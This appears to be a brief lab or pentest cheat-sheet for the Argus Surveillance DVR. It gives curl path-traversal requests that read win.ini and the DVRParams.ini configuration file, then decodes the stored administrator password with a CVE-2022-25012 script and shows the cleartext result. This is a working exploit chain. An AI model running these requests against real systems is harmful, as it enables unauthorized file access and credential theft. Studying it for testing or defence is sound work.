Argus Surveillance DVR
LFI
$ curl "http://dvr4:8080/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fwin.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD=" -
# Configuration file
$ curl "http://dvr4:8080/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2f..%5cprogramdata%5cPY_Software%5cArgus+surveillance+dvr%5cdvrparams.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD=" --proxy 127.0.0.1:8080Decryption
$ cat DVRParams.ini | grep -i "^password"
Password0=ECB453D16069F641E03BD9BD956BFE36BD8F3CD9D9A8 # Administrator
$ python3 CVE-2022-25012.py ECB453D16069F641E03BD9BD956BFE36BD8F3CD9D9A8
[+] Password: 14WatchD0g$Last updated